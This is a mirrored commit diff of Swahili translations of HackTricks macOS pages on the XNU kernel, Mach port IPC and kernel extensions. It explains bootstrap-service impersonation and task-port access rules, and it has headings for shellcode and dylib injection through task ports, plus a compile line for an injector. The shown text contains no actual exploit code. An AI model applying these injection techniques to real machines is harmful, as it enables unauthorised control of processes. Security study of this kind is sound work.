maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/macos-hardening/macos-security-and-privilege-escalation

Browse Source
This commit is contained in:
Translator 2025-01-03 06:11:33 +00:00
parent 95e7bdf269
commit ec777f0b01
254 changed files with 2757 additions and 2761 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
View File

@ -4,32 +4,32 @@
## XNU Kernel
**Msingi wa macOS ni XNU**, ambayo inasimama kwa "X is Not Unix". Kernel hii kimsingi inajumuisha **Mach microkernel** (itaongelewa baadaye), **na** vipengele kutoka Berkeley Software Distribution (**BSD**). XNU pia inatoa jukwaa kwa **madereva ya kernel kupitia mfumo unaoitwa I/O Kit**. Kernel ya XNU ni sehemu ya mradi wa wazi wa chanzo wa Darwin, ambayo inamaanisha **kanuni yake ya chanzo inapatikana bure**.
**Msingi wa macOS ni XNU**, ambayo inasimama kwa "X is Not Unix". Kernel hii kimsingi inajumuisha **Mach microkernel** (itajadiliwa baadaye), **na** vipengele kutoka Berkeley Software Distribution (**BSD**). XNU pia inatoa jukwaa kwa **madereva ya kernel kupitia mfumo unaoitwa I/O Kit**. Kernel ya XNU ni sehemu ya mradi wa wazi wa chanzo wa Darwin, ambayo inamaanisha **kanuni yake ya chanzo inapatikana bure**.
Kutoka kwa mtazamo wa mtafiti wa usalama au mendelezo wa Unix, **macOS** inaweza kuonekana kuwa **kama** mfumo wa **FreeBSD** wenye GUI nzuri na idadi ya programu za kawaida. Programu nyingi zilizotengenezwa kwa BSD zitakusanywa na kuendesha kwenye macOS bila kuhitaji marekebisho, kwani zana za amri zinazojulikana kwa watumiaji wa Unix zipo zote kwenye macOS. Hata hivyo, kwa sababu kernel ya XNU inajumuisha Mach, kuna tofauti kubwa kati ya mfumo wa jadi wa Unix na macOS, na tofauti hizi zinaweza kusababisha matatizo ya uwezekano au kutoa faida za kipekee.
Kutoka kwa mtazamo wa mtafiti wa usalama au mendelezo wa Unix, **macOS** inaweza kuonekana kuwa **kama** mfumo wa **FreeBSD** wenye GUI nzuri na programu nyingi za kawaida. Programu nyingi zilizotengenezwa kwa BSD zitakusanywa na kuendesha kwenye macOS bila kuhitaji marekebisho, kwani zana za amri zinazojulikana kwa watumiaji wa Unix zipo zote kwenye macOS. Hata hivyo, kwa sababu kernel ya XNU inajumuisha Mach, kuna tofauti kubwa kati ya mfumo wa jadi wa Unix na macOS, na tofauti hizi zinaweza kusababisha matatizo ya uwezekano au kutoa faida za kipekee.
Toleo la wazi la XNU: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/)
### Mach
Mach ni **microkernel** iliyoundwa kuwa **UNIX-inayofaa**. Moja ya kanuni zake kuu za muundo ilikuwa **kupunguza** kiasi cha **kanuni** inayotumika katika **nafasi ya kernel** na badala yake kuruhusu kazi nyingi za kawaida za kernel, kama vile mfumo wa faili, mtandao, na I/O, **kufanya kazi kama kazi za ngazi ya mtumiaji**.
Mach ni **microkernel** iliyoundwa kuwa **UNIX-inayofaa**. Moja ya kanuni zake kuu za kubuni ilikuwa **kupunguza** kiasi cha **kanuni** inayotembea katika **nafasi ya kernel** na badala yake kuruhusu kazi nyingi za kawaida za kernel, kama vile mfumo wa faili, mtandao, na I/O, **kufanya kazi kama kazi za ngazi ya mtumiaji**.
Katika XNU, Mach ni **responsible kwa shughuli nyingi muhimu za kiwango cha chini** ambazo kernel kwa kawaida inashughulikia, kama vile kupanga ratiba ya processor, multitasking, na usimamizi wa kumbukumbu ya virtual.
### BSD
Kernel ya XNU pia **inajumuisha** kiasi kikubwa cha kanuni inayotokana na mradi wa **FreeBSD**. Kanuni hii **inafanya kazi kama sehemu ya kernel pamoja na Mach**, katika nafasi moja ya anwani. Hata hivyo, kanuni ya FreeBSD ndani ya XNU inaweza kutofautiana kwa kiasi kikubwa na kanuni ya asili ya FreeBSD kwa sababu marekebisho yalihitajika kuhakikisha ufanisi wake na Mach. FreeBSD inachangia katika shughuli nyingi za kernel ikiwa ni pamoja na:
Kernel ya XNU pia **inajumuisha** kiasi kikubwa cha kanuni inayotokana na mradi wa **FreeBSD**. Kanuni hii **inasimama kama sehemu ya kernel pamoja na Mach**, katika nafasi moja ya anwani. Hata hivyo, kanuni ya FreeBSD ndani ya XNU inaweza kutofautiana sana na kanuni ya asili ya FreeBSD kwa sababu marekebisho yalihitajika kuhakikisha ufanisi wake na Mach. FreeBSD inachangia katika shughuli nyingi za kernel ikiwa ni pamoja na:
- Usimamizi wa mchakato
- Kushughulikia ishara
- Mekanismu za msingi za usalama, ikiwa ni pamoja na usimamizi wa mtumiaji na kikundi
- Miundombinu ya wito wa mfumo
- TCP/IP stack na soketi
- Firewall na kuchuja pakiti
- TCP/IP stack na sockets
- Firewall na uchujaji wa pakiti
Kuelewa mwingiliano kati ya BSD na Mach kunaweza kuwa ngumu, kutokana na mifumo yao tofauti ya dhana. Kwa mfano, BSD inatumia michakato kama kitengo chake cha msingi cha utekelezaji, wakati Mach inafanya kazi kwa msingi wa nyuzi. Tofauti hii inarekebishwa katika XNU kwa **kuunganisha kila mchakato wa BSD na kazi ya Mach** ambayo ina nyuzi moja tu ya Mach. Wakati wito wa mfumo wa fork() wa BSD unapotumika, kanuni ya BSD ndani ya kernel inatumia kazi za Mach kuunda kazi na muundo wa nyuzi.
Zaidi ya hayo, **Mach na BSD kila mmoja ina mifano tofauti za usalama**: mfano wa usalama wa **Mach** unategemea **haki za bandari**, wakati mfano wa usalama wa BSD unafanya kazi kwa msingi wa **umiliki wa mchakato**. Tofauti kati ya mifano hii miwili mara nyingine imesababisha udhaifu wa kupanda kwa haki za ndani. Mbali na wito wa kawaida wa mfumo, pia kuna **Mach traps zinazoruhusu programu za nafasi ya mtumiaji kuingiliana na kernel**. Vipengele hivi tofauti pamoja vinaunda usanifu wa kipekee, wa mchanganyiko wa kernel ya macOS.
Zaidi ya hayo, **Mach na BSD kila mmoja ina mifano tofauti ya usalama**: mfano wa usalama wa **Mach** unategemea **haki za bandari**, wakati mfano wa usalama wa BSD unafanya kazi kwa msingi wa **umiliki wa mchakato**. Tofauti kati ya mifano hii miwili mara nyingine imesababisha udhaifu wa kupanda kwa haki za ndani. Mbali na wito wa kawaida wa mfumo, pia kuna **Mach traps zinazoruhusu programu za nafasi ya mtumiaji kuingiliana na kernel**. Vipengele hivi tofauti pamoja vinaunda usanifu wa kipekee, wa mchanganyiko wa kernel ya macOS.
### I/O Kit - Drivers
@ -57,7 +57,7 @@ macos-kernel-extensions.md
### macOS System Extensions
Badala ya kutumia Extensions za Kernel, macOS iliumba System Extensions, ambayo inatoa APIs za ngazi ya mtumiaji kuingiliana na kernel. Kwa njia hii, waendelezaji wanaweza kuepuka kutumia extensions za kernel.
Badala ya kutumia Extensions za Kernel, macOS iliumba Extensions za Mfumo, ambazo zinatoa APIs za ngazi ya mtumiaji kuingiliana na kernel. Kwa njia hii, waendelezaji wanaweza kuepuka kutumia extensions za kernel.
{{#ref}}
macos-system-extensions.md

50
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
View File

@ -18,12 +18,12 @@ Mchakato pia unaweza kutuma jina la bandari pamoja na haki fulani **kwa kazi tof
Haki za bandari, ambazo zinaelezea ni shughuli zipi kazi inaweza kufanya, ni muhimu kwa mawasiliano haya. Haki zinazowezekana za **bandari** ni ([mafafanuo kutoka hapa](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)):
- **Haki ya Kupokea**, ambayo inaruhusu kupokea ujumbe uliopelekwa kwa bandari. Bandari za Mach ni MPSC (mzalishaji-mwingi, mtumiaji-mmoja) foleni, ambayo ina maana kwamba kunaweza kuwa na **haki moja tu ya kupokea kwa kila bandari** katika mfumo mzima (kinyume na mabomba, ambapo michakato mingi inaweza kuwa na viashiria vya faili kwa mwisho wa kusoma wa bomba moja).
- **Haki ya Kupokea**, ambayo inaruhusu kupokea ujumbe uliopelekwa kwa bandari. Bandari za Mach ni MPSC (mzalishaji-mwingi, mtumiaji-mmoja) foleni, ambayo inamaanisha kuwa kunaweza kuwa na **haki moja ya kupokea kwa kila bandari** katika mfumo mzima (kinyume na mabomba, ambapo michakato mingi inaweza kushikilia viashiria vya faili kwa mwisho wa kusoma wa bomba moja).
- **Kazi yenye Haki ya Kupokea** inaweza kupokea ujumbe na **kuunda Haki za Kutuma**, ikiruhusu kutuma ujumbe. Awali, tu **kazi yake mwenyewe ina Haki ya Kupokea juu ya bandari yake**.
- **Haki ya Kutuma**, ambayo inaruhusu kutuma ujumbe kwa bandari.
- Haki ya Kutuma inaweza **kuigwa** hivyo kazi inayomiliki Haki ya Kutuma inaweza kuiga haki hiyo na **kuipatia kazi ya tatu**.
- **Haki ya Kutuma-mara moja**, ambayo inaruhusu kutuma ujumbe mmoja kwa bandari na kisha inatoweka.
- **Haki ya Seti ya Bandari**, ambayo inaashiria _seti ya bandari_ badala ya bandari moja. Kuondoa ujumbe kutoka kwa seti ya bandari kunamaanisha kuondoa ujumbe kutoka kwa moja ya bandari inazozishikilia. Seti za bandari zinaweza kutumika kusikiliza kwenye bandari kadhaa kwa wakati mmoja, kama vile `select`/`poll`/`epoll`/`kqueue` katika Unix.
- **Haki ya Seti ya Bandari**, ambayo inaashiria _seti ya bandari_ badala ya bandari moja. Kuondoa ujumbe kutoka kwa seti ya bandari kunamaanisha kuondoa ujumbe kutoka kwa moja ya bandari inazozishikilia. Seti za bandari zinaweza kutumika kusikiliza kwenye bandari kadhaa kwa wakati mmoja, kama `select`/`poll`/`epoll`/`kqueue` katika Unix.
- **Jina la Kufa**, ambalo si haki halisi ya bandari, bali ni tu nafasi ya kuweka. Wakati bandari inaharibiwa, haki zote zilizopo za bandari kwa bandari hiyo zinageuka kuwa majina ya kufa.
**Kazi zinaweza kuhamasisha Haki za KUTUMA kwa wengine**, na kuwapa uwezo wa kutuma ujumbe nyuma. **Haki za KUTUMA pia zinaweza kuigwa, hivyo kazi inaweza kuiga na kutoa haki hiyo kwa kazi ya tatu**. Hii, pamoja na mchakato wa kati unaojulikana kama **seva ya bootstrap**, inaruhusu mawasiliano bora kati ya kazi.
@ -41,29 +41,29 @@ Kama ilivyotajwa, ili kuanzisha njia ya mawasiliano, **seva ya bootstrap** (**la
1. Kazi **A** inaanzisha **bandari mpya**, ikipata **haki ya KUPOKEA** katika mchakato.
2. Kazi **A**, ikiwa ni mmiliki wa haki ya KUPOKEA, **inazalisha haki ya KUTUMA kwa bandari**.
3. Kazi **A** inaweka **kiunganishi** na **seva ya bootstrap**, ikitoa **jina la huduma ya bandari** na **haki ya KUTUMA** kupitia utaratibu unaojulikana kama usajili wa bootstrap.
4. Kazi **B** inashirikiana na **seva ya bootstrap** ili kutekeleza **kuangalia huduma** kwa jina. Ikiwa inafanikiwa, **seva inakopya haki ya KUTUMA** iliyopokelewa kutoka Kazi A na **kupeleka kwa Kazi B**.
5. Baada ya kupata haki ya KUTUMA, Kazi **B** inaweza **kuunda** ujumbe na kupeleka **kwa Kazi A**.
4. Kazi **B** inashirikiana na **seva ya bootstrap** ili kutekeleza **kuangalia huduma** kwa jina. Ikiwa inafanikiwa, **seva inakopi haki ya KUTUMA** iliyopokelewa kutoka Kazi A na **kuhamasisha kwa Kazi B**.
5. Baada ya kupata haki ya KUTUMA, Kazi **B** ina uwezo wa **kuunda** ujumbe na kuutuma **kwa Kazi A**.
6. Kwa mawasiliano ya pande mbili, kawaida kazi **B** inaunda bandari mpya yenye haki ya **KUPOKEA** na haki ya **KUTUMA**, na inampa **haki ya KUTUMA kwa Kazi A** ili iweze kutuma ujumbe kwa KAZI B (mawasiliano ya pande mbili).
Seva ya bootstrap **haiwezi kuthibitisha** jina la huduma linalodaiwa na kazi. Hii ina maana kwamba **kazi** inaweza kwa urahisi **kujifanya kama kazi yoyote ya mfumo**, kama vile kudai kwa uwongo jina la huduma ya idhini na kisha kuidhinisha kila ombi.
Seva ya bootstrap **haiwezi kuthibitisha** jina la huduma linalodaiwa na kazi. Hii inamaanisha kuwa **kazi** inaweza kuweza **kujifanya kuwa kazi yoyote ya mfumo**, kama kudai kwa uwongo jina la huduma ya idhini na kisha kuidhinisha kila ombi.
Kisha, Apple inahifadhi **majina ya huduma zinazotolewa na mfumo** katika faili za usanidi salama, zilizoko katika **directories zilizolindwa na SIP**: `/System/Library/LaunchDaemons` na `/System/Library/LaunchAgents`. Pamoja na kila jina la huduma, **binary inayohusiana pia huhifadhiwa**. Seva ya bootstrap, itaunda na kushikilia **haki ya KUPOKEA kwa kila moja ya majina haya ya huduma**.
Kisha, Apple inahifadhi **majina ya huduma zinazotolewa na mfumo** katika faili za usanidi salama, zilizoko katika **directories zilizolindwa na SIP**: `/System/Library/LaunchDaemons` na `/System/Library/LaunchAgents`. Pamoja na kila jina la huduma, **binary inayohusiana pia inahifadhiwa**. Seva ya bootstrap, itaunda na kushikilia **haki ya KUPOKEA kwa kila moja ya majina haya ya huduma**.
Kwa huduma hizi zilizowekwa awali, **mchakato wa kuangalia unabadilika kidogo**. Wakati jina la huduma linatafutwa, launchd inaanzisha huduma hiyo kwa njia ya kidinamik. Mchakato mpya ni kama ifuatavyo:
Kwa huduma hizi zilizopangwa, **mchakato wa kuangalia unabadilika kidogo**. Wakati jina la huduma linatafutwa, launchd inaanzisha huduma hiyo kwa njia ya kidinari. Mchakato mpya ni kama ifuatavyo:
- Kazi **B** inaanzisha **kuangalia** kwa jina la huduma.
- **launchd** inakagua ikiwa kazi inafanya kazi na ikiwa haifanyi, **inaanzisha**.
- Kazi **A** (huduma) inafanya **kujiandikisha kwa bootstrap**. Hapa, seva ya **bootstrap** inaunda haki ya KUTUMA, inashikilia hiyo, na **inapeleka haki ya KUPOKEA kwa Kazi A**.
- launchd inakopya **haki ya KUTUMA na kupeleka kwa Kazi B**.
- Kazi **A** (huduma) inafanya **kuangalia kwa bootstrap**. Hapa, seva ya **bootstrap** inaunda haki ya KUTUMA, inashikilia, na **kuhamasisha haki ya KUPOKEA kwa Kazi A**.
- launchd inakopi **haki ya KUTUMA na kuhamasisha kwa Kazi B**.
- Kazi **B** inaunda bandari mpya yenye haki ya **KUPOKEA** na haki ya **KUTUMA**, na inampa **haki ya KUTUMA kwa Kazi A** (huduma) ili iweze kutuma ujumbe kwa KAZI B (mawasiliano ya pande mbili).
Hata hivyo, mchakato huu unatumika tu kwa kazi za mfumo zilizowekwa awali. Kazi zisizo za mfumo bado zinafanya kazi kama ilivyoelezwa awali, ambayo inaweza kuruhusu kujifanya.
Hata hivyo, mchakato huu unatumika tu kwa kazi za mfumo zilizopangwa. Kazi zisizo za mfumo bado zinafanya kazi kama ilivyoelezwa awali, ambayo inaweza kuruhusu kujifanya.
### Ujumbe wa Mach
[Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
Kazi ya `mach_msg`, kimsingi ni wito wa mfumo, inatumika kwa kutuma na kupokea ujumbe wa Mach. Kazi hii inahitaji ujumbe utakaotumwa kama hoja ya awali. Ujumbe huu lazima uanze na muundo wa `mach_msg_header_t`, ukifuatwa na maudhui halisi ya ujumbe. Muundo umefafanuliwa kama ifuatavyo:
Kazi ya `mach_msg`, kimsingi ni wito wa mfumo, inatumika kutuma na kupokea ujumbe wa Mach. Kazi hii inahitaji ujumbe utakaotumwa kama hoja ya awali. Ujumbe huu lazima uanze na muundo wa `mach_msg_header_t`, ukifuatwa na maudhui halisi ya ujumbe. Muundo umefafanuliwa kama ifuatavyo:
```c
typedef struct {
mach_msg_bits_t msgh_bits;
@ -79,7 +79,7 @@ Mchakato unaomiliki _**kupokea haki**_ unaweza kupokea ujumbe kwenye bandari ya
Ili kufikia **mawasiliano ya pande mbili** kwa urahisi, mchakato unaweza kubainisha **bandari ya mach** katika **kichwa cha ujumbe** kinachoitwa _bandari ya majibu_ (**`msgh_local_port`**) ambapo **mpokeaji** wa ujumbe anaweza **kutuma jibu** kwa ujumbe huu. Bitflags katika **`msgh_bits`** zinaweza kutumika ku **onyesha** kwamba **haki ya tuma-mara-moja** inapaswa kutolewa na kuhamishwa kwa bandari hii (`MACH_MSG_TYPE_MAKE_SEND_ONCE`).
> [!TIP]
> Kumbuka kwamba aina hii ya mawasiliano ya pande mbili inatumika katika ujumbe wa XPC ambao unatarajia replay (`xpc_connection_send_message_with_reply` na `xpc_connection_send_message_with_reply_sync`). Lakini **kwa kawaida bandari tofauti zinaundwa** kama ilivyoelezwa hapo awali ili kuunda mawasiliano ya pande mbili.
> Kumbuka kwamba aina hii ya mawasiliano ya pande mbili inatumika katika ujumbe za XPC zinazotarajia jibu (`xpc_connection_send_message_with_reply` na `xpc_connection_send_message_with_reply_sync`). Lakini **kwa kawaida bandari tofauti zinaanzishwa** kama ilivyoelezwa hapo awali ili kuunda mawasiliano ya pande mbili.
Sehemu nyingine za kichwa cha ujumbe ni:
@ -89,7 +89,7 @@ Sehemu nyingine za kichwa cha ujumbe ni:
- `msgh_id`: ID ya ujumbe huu, ambayo inatafsiriwa na mpokeaji.
> [!CAUTION]
> Kumbuka kwamba **ujumbe wa mach unatumwa kupitia \_bandari ya mach**\_, ambayo ni **mpokeaji mmoja**, **watumaji wengi** njia ya mawasiliano iliyojengwa ndani ya kernel ya mach. **Mchakato wengi** wanaweza **kutuma ujumbe** kwa bandari ya mach, lakini kwa wakati wowote mchakato mmoja tu unaweza **kusoma** kutoka kwake.
> Kumbuka kwamba **ujumbe za mach zinatumwa kupitia \_bandari ya mach**\_, ambayo ni **mpokeaji mmoja**, **watumaji wengi** njia ya mawasiliano iliyojengwa ndani ya kernel ya mach. **Mchakato wengi** wanaweza **kutuma ujumbe** kwa bandari ya mach, lakini wakati wowote mchakato mmoja tu unaweza **kusoma** kutoka kwake.
### Orodhesha bandari
```bash
@ -227,16 +227,16 @@ printf("Sent a message\n");
### Bandari za Kipekee
- **Bandari ya mwenyeji**: Ikiwa mchakato una **Haki ya Kutuma** juu ya bandari hii anaweza kupata **taarifa** kuhusu **mfumo** (mfano `host_processor_info`).
- **Bandari ya haki ya mwenyeji**: Mchakato wenye **Haki ya Kutuma** juu ya bandari hii unaweza kufanya **vitendo vya kipekee** kama kupakia nyongeza ya kernel. **Mchakato unahitaji kuwa mzizi** ili kupata ruhusa hii.
- **Bandari ya mwenyeji**: Ikiwa mchakato una **Send** ruhusa juu ya bandari hii anaweza kupata **habari** kuhusu **mfumo** (mfano `host_processor_info`).
- **Bandari ya ruhusa ya mwenyeji**: Mchakato wenye **Send** haki juu ya bandari hii unaweza kufanya **vitendo vya kipekee** kama kupakia nyongeza ya kernel. **Mchakato unahitaji kuwa root** ili kupata ruhusa hii.
- Zaidi ya hayo, ili kuita **`kext_request`** API inahitajika kuwa na haki nyingine **`com.apple.private.kext*`** ambazo zinatolewa tu kwa binaries za Apple.
- **Bandari ya jina la kazi:** Toleo lisilo na haki la _bandari ya kazi_. Inarejelea kazi, lakini haiwezeshi kudhibiti. Kitu pekee kinachonekana kupatikana kupitia hiyo ni `task_info()`.
- **Bandari ya kazi** (pia inajulikana kama bandari ya kernel)**:** Kwa ruhusa ya Kutuma juu ya bandari hii inawezekana kudhibiti kazi (kusoma/kandika kumbukumbu, kuunda nyuzi...).
- Piga `mach_task_self()` ili **kupata jina** la bandari hii kwa kazi ya mpiga simu. Bandari hii ni **inas inherit** kupitia **`exec()`**; kazi mpya iliyoundwa kwa `fork()` inapata bandari mpya ya kazi (kama kesi maalum, kazi pia inapata bandari mpya ya kazi baada ya `exec()` katika binary ya suid). Njia pekee ya kuanzisha kazi na kupata bandari yake ni kufanya ["port swap dance"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) wakati wa kufanya `fork()`.
- **Bandari ya kazi** (pia inajulikana kama bandari ya kernel)**:** Kwa ruhusa ya Send juu ya bandari hii inawezekana kudhibiti kazi (kusoma/kandika kumbukumbu, kuunda nyuzi...).
- Piga `mach_task_self()` ili **kupata jina** la bandari hii kwa kazi ya mpiga simu. Bandari hii ni **inherited** tu kupitia **`exec()`**; kazi mpya iliyoundwa kwa `fork()` inapata bandari mpya ya kazi (kama kesi maalum, kazi pia inapata bandari mpya ya kazi baada ya `exec()` katika binary ya suid). Njia pekee ya kuanzisha kazi na kupata bandari yake ni kufanya ["port swap dance"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) wakati wa kufanya `fork()`.
- Hizi ndizo vizuizi vya kufikia bandari (kutoka `macos_task_policy` kutoka binary `AppleMobileFileIntegrity`):
- Ikiwa programu ina **`com.apple.security.get-task-allow` entitlement** mchakato kutoka **mtumiaji yule yule wanaweza kufikia bandari ya kazi** (kawaida huongezwa na Xcode kwa ajili ya ufuatiliaji). Mchakato wa **notarization** hautaruhusu kwa toleo la uzalishaji.
- Programu zenye **`com.apple.system-task-ports`** entitlement zinaweza kupata **bandari ya kazi kwa mchakato wowote**, isipokuwa kernel. Katika toleo za zamani ilijulikana kama **`task_for_pid-allow`**. Hii inatolewa tu kwa programu za Apple.
- **Mzizi anaweza kufikia bandari za kazi** za programu **zisizokamilishwa** na **runtime iliyoimarishwa** (na sio kutoka Apple).
- Ikiwa programu ina **`com.apple.security.get-task-allow` ruhusa** mchakato kutoka **mtumiaji yule yule wanaweza kufikia bandari ya kazi** (kawaida huongezwa na Xcode kwa ajili ya ufuatiliaji). Mchakato wa **notarization** hautaruhusu kwa toleo la uzalishaji.
- Programu zenye **`com.apple.system-task-ports`** ruhusa zinaweza kupata **bandari ya kazi kwa mchakato wowote**, isipokuwa kernel. Katika toleo za zamani ilijulikana kama **`task_for_pid-allow`**. Hii inatolewa tu kwa programu za Apple.
- **Root anaweza kufikia bandari za kazi** za programu **zisizokamilishwa** na **runtime iliyoimarishwa** (na sio kutoka Apple).
### Uingizaji wa Shellcode katika nyuzi kupitia Bandari ya Kazi
@ -500,13 +500,13 @@ gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
```
### Dylib Injection katika thread kupitia Task port
Katika macOS **threads** zinaweza kudhibitiwa kupitia **Mach** au kutumia **posix `pthread` api**. Thread tuliyoitengeneza katika sindano ya awali, ilitengenezwa kwa kutumia Mach api, hivyo **siyo ya posix compliant**.
Katika macOS **threads** zinaweza kudhibitiwa kupitia **Mach** au kutumia **posix `pthread` api**. Thread tuliyoitengeneza katika sindano ya awali, ilitengenezwa kwa kutumia Mach api, hivyo **siyo ya posix**.
Ilikuwa inawezekana **kuiingiza shellcode rahisi** ili kutekeleza amri kwa sababu **haikuhitaji kufanya kazi na apis za posix** zinazokubalika, bali tu na Mach. **Mingine ya kuingiza** itahitaji **thread** pia iwe **posix compliant**.
Ilikuwa inawezekana **kuiingiza shellcode rahisi** ili kutekeleza amri kwa sababu **haikuhitaji kufanya kazi na posix** zinazokubalika, bali tu na Mach. **Kuingiza kwa hali ngumu zaidi** kutahitaji **thread** pia iwe **ya posix**.
Hivyo, ili **kuboresha thread** inapaswa kuita **`pthread_create_from_mach_thread`** ambayo itaunda **pthread halali**. Kisha, hii pthread mpya inaweza **kuita dlopen** ili **kupakia dylib** kutoka mfumo, hivyo badala ya kuandika shellcode mpya ili kutekeleza vitendo tofauti, inawezekana kupakia maktaba maalum.
Unaweza kupata **esempe dylibs** katika (kwa mfano ile inayozalisha log na kisha unaweza kuisikiliza):
Unaweza kupata **esemble dylibs** katika (kwa mfano ile inayozalisha log na kisha unaweza kuisikiliza):
{{#ref}}
../../macos-dyld-hijacking-and-dyld_insert_libraries.md
@ -802,9 +802,9 @@ Katika mbinu hii, nyuzi ya mchakato inatekwa:
### Taarifa za Msingi
XPC, ambayo inasimama kwa XNU (kernel inayotumiwa na macOS) mawasiliano kati ya Mchakato, ni mfumo wa **mawasiliano kati ya michakato** kwenye macOS na iOS. XPC inatoa mekanizma ya kufanya **kuitana kwa njia salama, zisizo za kawaida kati ya michakato tofauti** kwenye mfumo. Ni sehemu ya mtindo wa usalama wa Apple, ikiruhusu **kuundwa kwa programu zenye ruhusa tofauti** ambapo kila **kipengele** kinakimbia na **ruhusa pekee inayoihitaji** kufanya kazi yake, hivyo kupunguza uharibifu unaoweza kutokea kutokana na mchakato ulioathirika.
XPC, ambayo inasimama kwa XNU (kernel inayotumiwa na macOS) mawasiliano kati ya Mchakato, ni mfumo wa **mawasiliano kati ya michakato** kwenye macOS na iOS. XPC inatoa mekanizma ya kufanya **kuitana kwa njia salama, zisizo za wakati mmoja kati ya michakato tofauti** kwenye mfumo. Ni sehemu ya mtindo wa usalama wa Apple, ikiruhusu **kuundwa kwa programu zenye ruhusa tofauti** ambapo kila **kipengele** kinakimbia na **ruhusa pekee inayoihitaji** kufanya kazi yake, hivyo kupunguza uharibifu unaoweza kutokea kutokana na mchakato ulioathirika.
Kwa maelezo zaidi kuhusu jinsi **mawasiliano haya yanavyofanya kazi** na jinsi **yanavyoweza kuwa na udhaifu**, angalia:
Kwa maelezo zaidi kuhusu jinsi **mawasiliano haya yanavyofanya kazi** na jinsi **yanavyoweza kuwa na udhaifu** angalia:
{{#ref}}
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/

26
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
View File

@ -8,25 +8,25 @@ Kernel extensions (Kexts) ni **packages** zenye **`.kext`** extension ambazo zin
### Requirements
Kwa wazi, hii ni nguvu sana kiasi kwamba ni **ngumu kupakia kernel extension**. Hizi ndizo **requirements** ambazo kernel extension lazima ikidhi ili ipakie:
Kwa wazi, hii ni nguvu sana kiasi kwamba ni **ngumu kupakia kernel extension**. Hizi ndizo **mahitaji** ambayo kernel extension inapaswa kukidhi ili ipakie:
- Wakati wa **kuingia kwenye recovery mode**, kernel **extensions lazima ziaruhusiwe** kupakiwa:
<figure><img src="../../../images/image (327).png" alt=""><figcaption></figcaption></figure>
- Kernel extension lazima iwe **signed with a kernel code signing certificate**, ambayo inaweza tu **kupewa na Apple**. Nani atakayeangalia kwa undani kampuni na sababu zinazohitajika.
- Kernel extension lazima iwe **imesainiwa na cheti cha kernel code signing**, ambacho kinaweza tu **kupewa na Apple**. Nani atakayeangalia kwa undani kampuni na sababu zinazohitajika.
- Kernel extension lazima pia iwe **notarized**, Apple itakuwa na uwezo wa kuangalia kwa malware.
- Kisha, mtumiaji wa **root** ndiye anayeweza **kupakia kernel extension** na faili ndani ya package lazima **zihusiane na root**.
- Wakati wa mchakato wa kupakia, package lazima iwe tayari katika **mahali salama yasiyo ya root**: `/Library/StagedExtensions` (inahitaji `com.apple.rootless.storage.KernelExtensionManagement` grant).
- Hatimaye, wakati wa kujaribu kuipakia, mtumiaji atapokea [**ombile la uthibitisho**](https://developer.apple.com/library/archive/technotes/tn2459/_index.html) na, ikiwa itakubaliwa, kompyuta lazima **irejeshwe** ili kuipakia.
- Hatimaye, wakati wa kujaribu kuipakia, mtumiaji atapokea [**ombile la uthibitisho**](https://developer.apple.com/library/archive/technotes/tn2459/_index.html) na, ikiwa itakubaliwa, kompyuta lazima **irejeshwe** ili ipakie.
### Loading process
Katika Catalina ilikuwa hivi: Ni muhimu kutaja kwamba mchakato wa **verification** unafanyika katika **userland**. Hata hivyo, ni programu pekee zenye **`com.apple.private.security.kext-management`** grant zinaweza **kuomba kernel kupakia extension**: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd`
Katika Catalina ilikuwa hivi: Ni muhimu kutaja kwamba mchakato wa **uthibitishaji** unafanyika katika **userland**. Hata hivyo, ni programu pekee zenye **`com.apple.private.security.kext-management`** grant zinaweza **kuomba kernel kupakia extension**: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd`
1. **`kextutil`** cli **inaanza** mchakato wa **verification** wa kupakia extension
1. **`kextutil`** cli **inaanza** mchakato wa **uthibitishaji** wa kupakia extension
- Itazungumza na **`kextd`** kwa kutuma kwa kutumia **Mach service**.
2. **`kextd`** itakagua mambo kadhaa, kama vile **signature**
2. **`kextd`** itakagua mambo kadhaa, kama vile **saini**
- Itazungumza na **`syspolicyd`** ili **kuangalia** ikiwa extension inaweza **kupakiwa**.
3. **`syspolicyd`** itamwomba **mtumiaji** ikiwa extension haijawahi kupakiwa hapo awali.
- **`syspolicyd`** itaripoti matokeo kwa **`kextd`**
@ -45,9 +45,9 @@ kextstat | grep " 22 " | cut -c2-5,50- | cut -d '(' -f1
## Kernelcache
> [!CAUTION]
> Ingawa nyongeza za kernel zinatarajiwa kuwa katika `/System/Library/Extensions/`, ukitembelea folda hii **hutapata binary yoyote**. Hii ni kwa sababu ya **kernelcache** na ili kubadilisha moja ya `.kext` unahitaji kupata njia ya kuipata.
> Ingawa nyongeza za kernel zinatarajiwa kuwa katika `/System/Library/Extensions/`, ukitembea kwenye folda hii **hutapata binary yoyote**. Hii ni kwa sababu ya **kernelcache** na ili kubadilisha moja ya `.kext` unahitaji kupata njia ya kuipata.
**Kernelcache** ni **toleo lililotayarishwa na kuunganishwa la kernel ya XNU**, pamoja na **madereva** muhimu na **nyongeza za kernel**. Inahifadhiwa katika muundo wa **kushinikizwa** na inachukuliwa kutoka kwenye kumbukumbu wakati wa mchakato wa kuanzisha. Kernelcache inarahisisha **wakati wa kuanzisha haraka** kwa kuwa na toleo lililo tayari la kernel na madereva muhimu yanapatikana, kupunguza muda na rasilimali ambazo zingetumika kwa kupakia na kuunganisha vipengele hivi kwa wakati wa kuanzisha.
